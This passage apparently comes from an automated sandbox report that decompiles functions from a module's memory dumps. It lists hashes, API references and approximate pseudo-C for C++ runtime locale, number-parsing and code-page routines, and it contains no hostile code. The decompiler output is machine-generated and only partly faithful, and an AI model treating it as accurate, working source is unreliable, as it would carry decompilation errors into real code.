Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 2897a9f3f15bf3ee11a5db74d9a1f0d4693305e6c9e9ba8fe2931e1743ff1846
Instruction ID: 4184fddacc040caa6f9e993d9ac516402ecf26ecb0239aff4cf00e30c4eba92e
Opcode Fuzzy Hash: 2897a9f3f15bf3ee11a5db74d9a1f0d4693305e6c9e9ba8fe2931e1743ff1846
Instruction Fuzzy Hash: FD01F9B5A0021ADFCB00CFE8C950BEE7B78AF14790F200519E515AB280CFB48AC9DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1DC229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1DBD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

0x6e1dc230
0x6e1dc235
0x6e1dc238
0x6e1dc23a
0x6e1dc23c
0x6e1dc241
0x6e1dc243
0x6e1dc245
0x6e1dc247
0x6e1dc249
0x6e1dc24f
0x6e1dc252
0x6e1dc257
0x6e1dc261
0x6e1dc265
0x6e1dc26d
0x6e1dc26e
0x6e1dc26f
0x6e1dc270
0x6e1dc273
0x6e1dc27b
0x6e1dc27b
0x6e1dc27d
0x6e1dc282
0x6e1dc287
0x6e1dc287
0x6e1dc282
0x6e1dc245
0x6e1dc28e
0x6e1dc294

APIs

__EH_prolog3.LIBCMT ref: 6E1DC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1DC265

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1DC276

Part of subcall function 6E1DBD9F: __EH_prolog3.LIBCMT ref: 6E1DBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1DC287

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 3c8a0630894acae94132dd04b2a27aa1019eb5dbee0708c7f491427470a03d39
Instruction ID: aadacd92615c85e6bbd36b7eec3b2774e3f06af080135d88ad3838fc8ed11430
Opcode Fuzzy Hash: 3c8a0630894acae94132dd04b2a27aa1019eb5dbee0708c7f491427470a03d39
Instruction Fuzzy Hash: 5101A475A0021ADFDF40DFE8C850BEEBB79AF54794F20091AE515AB280CF744AC9D790

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6E1E00AC(0x6e227d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6E1DF8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6E1A1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6E1A1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6e22a9c0;
						E6E1A1928(_t30, _t16);
						 *_t28 = _t30;
						E6E1A14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6E1E0075(_t12);
			}

0x6e1a18a7
0x6e1a18ac
0x6e1a18b1
0x6e1a18b3
0x6e1a18b6
0x6e1a18bf
0x6e1a18c2
0x6e1a18c8
0x6e1a18d5
0x6e1a18da
0x6e1a18e1
0x6e1a18e7
0x6e1a18ef
0x6e1a18f1
0x6e1a18f1
0x6e1a18b6
0x6e1a18f8
0x6e1a18fe

APIs

__EH_prolog3.LIBCMT ref: 6E1A18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1A18D5

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

ctype.LIBCPMT ref: 6E1A18E7

Part of subcall function 6E1A1928: __Getctype.LIBCPMT ref: 6E1A1937
Part of subcall function 6E1A1928: __Getcvt.LIBCPMT ref: 6E1A1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1A18F1

Part of subcall function 6E1A14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1A14F5
Part of subcall function 6E1A14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1566

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: cfed8dbe4c3fb151bce16119d75e122c1db1ee8668525d0018fda4793877d783
Instruction ID: 288e5d56354dac17ebab70982f75deb1a1a5184dc4a147f8ca348240d6528b30
Opcode Fuzzy Hash: cfed8dbe4c3fb151bce16119d75e122c1db1ee8668525d0018fda4793877d783
Instruction Fuzzy Hash: 34F03AB96006199FDB10DFE8C451BFDB7A9AF40765F20481DE3095B280DF745AC8EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1CB968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6E1E00E0(0x6e2286b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6E1CA2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6e22a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6E1CDA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6E1CA0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6e22a26c("0123456789ABCDEFabcdef-+Xx", 0x6e22ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6E1C6BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6E1C2B76(_t252 - 0x44);
											E6E1C2B76(_t252 - 0x5c);
											return E6E1E008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6E1CC59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6E1C9DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6E1CC59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6E1C86F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6E1CBD8B(_t198);
									} while (E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6E1CC59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6E1CBD8B(_t198);
								_t185 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6E1CC59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6E1CBD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6E1CC59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6E1CC59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6E1CC59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6E1CBD8B(_t198);
						goto L13;
					}
				}
			}

0x6e1cb968
0x6e1cb96f
0x6e1cb977
0x6e1cb97a
0x6e1cb980
0x6e1cb983
0x6e1cb987
0x6e1cb98a
0x6e1cb98f
0x6e1cb998
0x6e1cb99d
0x6e1cb9a5
0x6e1cb9a7
0x6e1cb9ab
0x6e1cb9af
0x6e1cb9be
0x6e1cb9b1
0x6e1cb9b1
0x6e1cb9b1
0x6e1cb9c4
0x6e1cb9e1
0x6e1cb9e9
0x6e1cb9eb
0x6e1cb9f5
0x6e1cb9f8
0x6e1cb9ff
0x6e1cba3f
0x6e1cba44
0x6e1cba4a
0x6e1cba4b
0x6e1cba54
0x6e1cba5a
0x6e1cba60
0x6e1cba69
0x6e1cba6b
0x6e1cba6b
0x6e1cba6d
0x6e1cba74
0x6e1cba77
0x6e1cba7a
0x6e1cba7d
0x6e1cba84
0x6e1cbb04
0x6e1cbb04
0x6e1cbb06
0x6e1cbb1e
0x6e1cbb21
0x6e1cbb2a
0x6e1cbb31
0x6e1cbb35
0x6e1cbb45
0x6e1cbb49
0x6e1cbb4b
0x6e1cbb4e
0x6e1cbb55
0x6e1cbc5d
0x6e1cbc60
0x6e1cbc63
0x6e1cbc63
0x6e1cbc66
0x6e1cbc6a
0x6e1cbc6d
0x6e1cbc6f
0x6e1cbc6f
0x6e1cbc74
0x6e1cbcdd
0x6e1cbcdd
0x00000000
0x6e1cbc76
0x6e1cbc76
0x6e1cbc7a
0x6e1cbc7f
0x00000000
0x00000000
0x6e1cbc81
0x6e1cbc84
0x6e1cbca5
0x6e1cbca7
0x6e1cbcc2
0x6e1cbcc2
0x6e1cbcc8
0x6e1cbcca
0x6e1cbcca
0x00000000
0x6e1cbcc8
0x6e1cbcb0
0x6e1cbcb3
0x6e1cbcb5
0x6e1cbcb5
0x6e1cbcbd
0x6e1cbcc0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1cbcc0
0x6e1cbc89
0x6e1cbc8c
0x6e1cbc92
0x6e1cbc94
0x6e1cbc97
0x6e1cbc97
0x6e1cbca0
0x6e1cbca3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1cbca3
0x6e1cbcce
0x6e1cbcd2
0x6e1cbcd5
0x6e1cbcd7
0x6e1cbcda
0x6e1cbcda
0x6e1cbce0
0x6e1cbce3
0x6e1cbce6
0x6e1cbcee
0x6e1cbcfa
0x6e1cbcfa
0x6e1cbc74
0x6e1cbb5b
0x6e1cbb5e
0x6e1cbb62
0x6e1cbb66
0x6e1cbb66
0x6e1cbb6e
0x6e1cbb71
0x6e1cbb80
0x6e1cbb88
0x6e1cbb8b
0x6e1cbb90
0x6e1cbbdc
0x6e1cbbdf
0x6e1cbbe2
0x6e1cbbe5
0x6e1cbbe8
0x6e1cbbea
0x6e1cbbea
0x6e1cbbec
0x6e1cbbf0
0x6e1cbc42
0x6e1cbc44
0x00000000
0x00000000
0x6e1cbc46
0x6e1cbc4c
0x6e1cbc4e
0x6e1cbc4e
0x6e1cbc54
0x6e1cbc59
0x00000000
0x6e1cbc56
0x6e1cbc56
0x00000000
0x6e1cbc56
0x6e1cbbf2
0x6e1cbbf2
0x6e1cbbf6
0x00000000
0x00000000
0x6e1cbbf8
0x6e1cbbfc
0x6e1cbc10
0x6e1cbbfe
0x6e1cbc00
0x6e1cbc05
0x6e1cbc08
0x6e1cbc0b
0x6e1cbc0b
0x6e1cbc13
0x6e1cbc16
0x00000000
0x6e1cbc18
0x6e1cbc1d
0x6e1cbc22
0x6e1cbc22
0x00000000
0x6e1cbc22
0x6e1cbc16
0x6e1cbb92
0x6e1cbb96
0x6e1cbb9c
0x6e1cbb9f
0x6e1cbba1
0x6e1cbbab
0x6e1cbbae
0x6e1cbbb2
0x6e1cbbb2
0x6e1cbbab
0x6e1cbbb9
0x6e1cbbbc
0x6e1cbbc0
0x6e1cbbc2
0x6e1cbbc2
0x6e1cbbc9
0x6e1cbbcf
0x6e1cbbd2
0x6e1cbbd4
0x6e1cbbd4
0x6e1cbbd7
0x6e1cbbd7
0x6e1cbbc9
0x6e1cbc23
0x6e1cbc25
0x6e1cbc34
0x6e1cbc3c
0x6e1cbc3f
0x00000000
0x6e1cbc3f
0x6e1cbb08
0x6e1cbb08
0x6e1cbb0a
0x00000000
0x00000000
0x6e1cbb0c
0x6e1cbb1b
0x00000000
0x6e1cbb1b
0x6e1cba89
0x6e1cba8d
0x6e1cba8d
0x6e1cba98
0x00000000
0x6e1cba9a
0x6e1cba9e
0x6e1cbaa1
0x6e1cbaa4
0x6e1cbaae
0x6e1cbab5
0x6e1cbafd
0x6e1cbafd
0x6e1cbaff
0x00000000
0x00000000
0x6e1cbb03
0x00000000
0x6e1cbb03
0x6e1cbaba
0x6e1cbabe
0x6e1cbabe
0x6e1cbac3
0x6e1cbac9
0x6e1cbae0
0x6e1cbae2
0x6e1cbaef
0x6e1cbaf0
0x6e1cbaf3
0x6e1cbaf6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1cbacb
0x6e1cbacf
0x6e1cbad3
0x6e1cbad8
0x6e1cbad8
0x6e1cbade
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1cbade
0x6e1cbac9
0x6e1cba98
0x6e1cba62
0x6e1cba64
0x6e1cba64
0x00000000
0x6e1cba64
0x6e1cba56
0x00000000
0x6e1cba01
0x6e1cba04
0x6e1cba08
0x6e1cba08
0x6e1cba0d
0x6e1cba13
0x6e1cba1a
0x6e1cba1e
0x6e1cba22
0x6e1cba27
0x6e1cba27
0x6e1cba2a
0x6e1cba2d
0x00000000
0x6e1cba2f
0x6e1cba2f
0x00000000
0x6e1cba2f
0x6e1cba15
0x6e1cba15
0x6e1cba32
0x6e1cba37
0x6e1cba3a
0x00000000
0x6e1cba3a
0x6e1cba13

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1CB96F

Part of subcall function 6E1CA2F1: __EH_prolog3.LIBCMT ref: 6E1CA2F8
Part of subcall function 6E1CA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
Part of subcall function 6E1CA2F1: int.LIBCPMT ref: 6E1CA319
Part of subcall function 6E1CA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373

_Find_unchecked1.LIBCPMT ref: 6E1CBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E1CB9D7

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 28c6ced91592e05667d3cab04ca0171ba7a2a3a998846dc8d07a122e665012bf
Instruction ID: 803cfd694f67ef58b20ffc7911cc71338604d9d4723fbeec1d6103b687c5b55e
Opcode Fuzzy Hash: 28c6ced91592e05667d3cab04ca0171ba7a2a3a998846dc8d07a122e665012bf
Instruction Fuzzy Hash: C3C19130E042888EDF11CBE4C490BECBB76AF35B04F645859D495EB24ECB7899C5EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E2060ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E20617D

Strings

pow, xrefs: 6E206155, 6E206172

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction ID: f3613378f1900d2b91a3137b18dde044b61d42383b3e9c695cae3ce6ff11752c
Opcode Fuzzy Hash: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction Fuzzy Hash: 0651AF6193C20F8BDB4166D4C9903DA77E7EB83702F304D58E191427DDEB3185C5DA92

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E21DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6E214323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e232f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e232f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6E20BF09(_t23, _t23);
									goto L25;
								}
								if(E6E214323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
